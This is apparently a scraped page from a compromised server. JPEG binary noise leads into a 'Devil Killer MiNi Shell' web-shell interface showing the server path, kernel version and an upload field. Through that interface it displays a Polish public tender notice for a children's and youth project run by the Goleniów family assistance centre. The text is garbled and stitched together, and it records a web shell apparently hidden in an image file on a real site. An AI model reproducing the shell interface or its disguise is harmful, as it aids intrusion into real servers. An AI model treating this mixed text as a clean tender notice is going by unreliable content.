JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221121/0044828501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Projekt RADiM – REGIONALNA AKADEMIA DZIECI I MŁODZIEŻY </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWE CENTRUM POMOCY RODZINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811768934</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Pocztowa 43</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Goleniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretriat@pcpr-goleniow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pcprgoleniow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Projekt RADiM – REGIONALNA AKADEMIA DZIECI I MŁODZIEŻY </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c98c3f07-6766-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00448285</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00313891/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Projekt &#34;Regionalna Akademia Dzieci i Młodzieży&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt Regionalna Akademia Dzieci i Młodzieży </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c98c3f07-6766-11ed-abdb-a69c1593877c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c98c3f07-6766-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c98c3f07-6766-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c98c3f07-6766-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) informujemy,<br/>że:<br/>1) Administratorem danych osobowych Wykonawcy jest Powiatowe Centrum Pomocy Rodzinie w Goleniowie z siedzibą: ul.<br/>Pocztowa 43, 72-100 Goleniów. Kontakt: osobisty w siedzibie urzędu, telefoniczny: 91 407 22 41; 91/418 38 60 fax – 91 418 38 60<br/>lub drogą elektroniczną na adres e-mail: sekretariat@pcpr-goleniow.pl<br/>2) W sprawach związanych z danymi osobowymi Wykonawca może kontaktować się z Inspektorem Ochrony Danych Osobowych,<br/>poprzez adres email: iodskwira@gmail.com<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-0aca8e7a-6743-11edabdba69c1593877c<br/>prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji;<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.), dalej<br/>„ustawa Pzp”;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy; a po tym czasie przez okres wymagany przepisami szczególnymi prawa, w szczególności ze względu na cele<br/>archiwalne- zgodnie z JRWA: dokumentacja zamówień publicznych posiada kategorię archiwalną B5 (okres przechowywania 5 lat)<br/>natomiast umowa zawartą w wyniku postępowania w trybie zamówień publicznych posiada kategorię archiwalną B10 (okres<br/>przechowywania 10 lat);<br/>6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp;<br/>7) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1) Posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>2) Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu<br/>przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PCPR.RADIM.271.7.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Jednodniowe plenerowe spotkanie warsztatowo - integracyjne.<br/>1.Przedmiot zamówienia.<br/>1) Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie plenerowego spotkania warsztatowo – integracyjnego<br/>dla 200 uczestników<br/>1) Plenerowe spotkanie warsztatowo – integracyjne adresowane jest dla uczestników projektu „Regionalna Akademia Dzieci<br/>i Młodzieży”, współfinansowanego ze środków Europejskiego Funduszu Społecznego, w ramach działania Regionalnego<br/>Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2014-2020, Oś Priorytetowa VII Włączenie<br/>społeczne, Działanie 7.6 Wsparcie rozwoju usług społecznych świadczonych w interesie ogólnym.<br/>2) W trakcie spotkania winny odbywać się konkursy, gry, animacje i warsztaty.<br/>Spotkanie ma być formą aktywizacji i integracji dzieci i rodzin poprzez wspólne i aktywne spędzanie czasu w warunkach<br/>pozadomowych oraz rozwijanie kompetencji relacyjnych między uczestnikami.<br/>3) Zamówienie obejmuje: catering; zapewnienie obsługi technicznej; zapewnienie miejsca spotkania; zaopatrzenie w<br/>energię elektryczną; zapewnienie namiotów, sceny, stołów, stolików i krzeseł/ławek; placu zabaw; animacji i warsztatów dla<br/>dzieci z zapewnieniem stanowisk animacyjnych wyposażonych w stosowną ilość stolików i krzeseł oraz doświadczonego<br/>zespołu animacyjnego do obsługi poszczególnych atrakcji; zapewnienie konferansjera; zorganizowanie zaplecza<br/>sanitarnego; zapewnienie serwisu sprzątającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80510000-2 - Usługi szkolenia specjalistycznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej zamawiający będzie się kierował następującymi kryteriami:<br/>1. Cena oferty, (C) 50 pkt<br/>2. Doświadczenie osób skierowanych do realizacji zadania (D) 20pkt.<br/>3. Atrakcje (A)20 pkt<br/>4. Klauzula społeczna 10 pkt<br/>W odniesieniu do Wykonawców, których oferty nie podlegają odrzuceniu dokonana zostanie ocena oferty w następujący sposób:<br/>ad.1 W kryterium cena oferty największą liczbę punktów uzyska oferta z najniższą ceną (brutto).<br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/>Cmin<br/>Wartość punktowa „C” = -------- x Max(C)<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>Cbad<br/>gdzie:<br/>Cmin - cena brutto najniższa spośród wszystkich ofert<br/>Cbad - cena brutto podana w ofercie badanej<br/>Max(C) - maksymalna ilość punktów, jakie może otrzymać oferta za kryterium cena oferty .<br/>ad.2.<br/>Wyliczenie wartości punktowej dla kryterium doświadczenie osób skierowanych do realizacji zadania obliczone zostanie według<br/>poniższego wzoru według zasady:<br/>1) Wskazana osoba organizowała 3-4 imprezy plenerowe dla szerokiego grona publiczności (w szczególności o charakterze<br/>artystyczno-rozrywkowym, edukacyjnym, rekreacyjnym lub sportowym) - zamawiający przyzna 5 pkt;<br/>2) Wskazana osoba organizowała 5-6 imprez plenerowych dla szerokiego grona publiczności (w szczególności o charakterze<br/>artystyczno-rozrywkowym, edukacyjnym, rekreacyjnym lub sportowym) - zamawiający przyzna 10 pkt;<br/>3) Wskazana osoba organizowała 7 lub więcej imprez plenerowych dla szerokiego grona publiczności (w szczególności o<br/>charakterze artystyczno-rozrywkowym, edukacyjnym, rekreacyjnym lub sportowym) - zamawiający przyzna 20 pkt;<br/>Brak wskazania w ofercie (w formularzu ofertowym) doświadczenia osób skierowanych do realizacji zadania (organizacji imprez<br/>plenerowych) będzie równoznaczne z brakiem minimalnej ilości przeprowadzonych imprez celem uzyskania dodatkowych punktów,<br/>czyli minimum 3, w tej sytuacji Wykonawca otrzyma 0 pkt.<br/>Jeżeli Wykonawca wskaże ilość zorganizowanych imprez plenerowych większą niż 7, do oceny ofert w kryterium „doświadczenie<br/>osób skierowanych do realizacji zadania” oferta otrzyma w tym kryterium oceny ofert 20 punktów.<br/>ad. 3<br/>Atrakcje, w ramach realizacji zadania polegają na:<br/>• podaniu liczby animacji i warsztatów o charakterze edukacyjnym, integracji międzypokoleniowej, zdrowego stylu życia,<br/>planowanych do zorganizowania podczas spotkania plenerowego dla szerokiego grona publiczności,<br/>• dopasowaniu atrakcji do dzieci, młodzieży, rodziców/opiekunów.<br/>Wyliczenie wartości punktowej dla kryterium atrakcje obliczone zostanie według zasady:<br/>1) zorganizowanie 11 animacji i warsztatów w plenerze dla dzieci, młodzieży, dorosłych (o charakterze edukacyjnym, ekologicznym,<br/>integracji międzypokoleniowej, zdrowego stylu życia) - zamawiający przyzna 5 pkt;<br/>2) zorganizowanie 12-13 animacji i warsztatów w plenerze dla dzieci, młodzieży, dorosłych (o charakterze edukacyjnym,<br/>ekologicznym, integracji międzypokoleniowej, zdrowego stylu życia) -- zamawiający przyzna 10 pkt;<br/>3) zorganizowanie 14 i więcej animacji i warsztatów w plenerze dla dzieci, młodzieży, dorosłych (o charakterze edukacyjnym,<br/>ekologicznym, integracji międzypokoleniowej, zdrowego stylu życia) -- zamawiający przyzna 20 pkt;<br/>Brak wskazania w ofercie (w formularzu ofertowym) atrakcji będzie równoznaczne z brakiem minimalnej ilości przeprowadzonych<br/>animacji i warsztatów celem uzyskania dodatkowych punktów, czyli minimum 11, w tej sytuacji Wykonawca otrzyma 0 pkt.<br/>Jeżeli Wykonawca wskaże liczbę animacji i warsztatów większą niż 14, do oceny ofert w kryterium „atrakcje” oferta otrzyma w tym<br/>kryterium oceny ofert 20 punktów.<br/>ad.4<br/>Wykonawca otrzyma dodatkowe punkty w tym kryterium jeśli do realizacji zamówienia zatrudni na umowę o pracę lub spółdzielczą<br/>umowę o pracę lub umowę cywilno-prawną osobę/osoby:<br/>zgodnie z ust.19.1.1 ad.4 SWZ - 10 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Atrakcje</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest zakup usług doradczych, specjalistycznych dla uczestniczek/uczestników projektu<br/>2) Uczestnikami poradnictwa prawnego będą osoby biorące udział w projekcie „Regionalna Akademia Dzieci i Młodzieży”,<br/>współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach działania Regionalnego Programu<br/>Operacyjnego Województwa Zachodniopomorskiego na lata 2014-2020, Oś Priorytetowa VII Włączenie społeczne,<br/>Działanie 7.6 Wsparcie rozwoju usług społecznych świadczonych w interesie ogólnym.<br/>3) poradnictwo prawne – 60 h </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312320-8 - Usługi doradztwa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej zamawiający będzie się kierował następującymi kryteria<br/>1. Cena oferty, (C) 60 pkt<br/>2. Doświadczenie osób skierowanych do realizacji zadania (D) 40pkt.<br/>ad.1 W kryterium cena oferty największą liczbę punktów uzyska oferta z najniższą ceną (brutto).<br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/>Cmin<br/>Wartość punktowa „C” = -------------------------------- x Max(C)<br/>Cbad<br/>gdzie:<br/>Cmin - cena brutto najniższa spośród wszystkich ofert<br/>Cbad - cena brutto podana w ofercie badanej<br/>Max(C) - maksymalna ilość punktów, jakie może otrzymać oferta za kryterium cena oferty (tj. 60 pkt)<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium.<br/>Oferta wypełniająca w najwyższym stopniu wymagania określone kryterium otrzyma maksymalną ilość punktów. Pozostałym<br/>Wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) ilość<br/>punktów.<br/>Ad 2. Sposób obliczenia punktów dla kryterium Doświadczenie osób skierowanych do realizacji zadania (D):<br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 40,00 pkt.<br/>Doświadczenie osób skierowanych do realizacji zadania polega na podaniu dla wskazanej osoby ilości godzin przeprowadzonego<br/>doradztwa prawnego, które to zostały przeprowadzone w okresie ostatnich trzech lat.<br/>Wyliczenie wartości punktowej dla kryterium doświadczenie osób skierowanych do realizacji zadania obliczone zostanie według<br/>poniższego wzoru według zasady:<br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawione niżej wzór:<br/>1) Wskazana osoba dysponuje doświadczeniem w ostatnich 3 - ech latach w prowadzeniu indywidualnych doradztw prawnych w<br/>zakresie pomocy członkom rodzin dotkniętych kryzysem o wielkości minimum 101 - 150 godzin – zamawiający przyzna 10 pkt;<br/>2) Wskazana osoba dysponuje doświadczeniem w ostatnich 3 - ech latach w prowadzeniu indywidualnych doradztw prawnych w<br/>zakresie pomocy członkom rodzin dotkniętych kryzysem o wielkości minimum 151- 200 godzin – zamawiający przyzna 20 pkt;<br/>3) Wskazana osoba dysponuje doświadczeniem w ostatnich 3 - ech latach w prowadzeniu indywidualnych doradztw 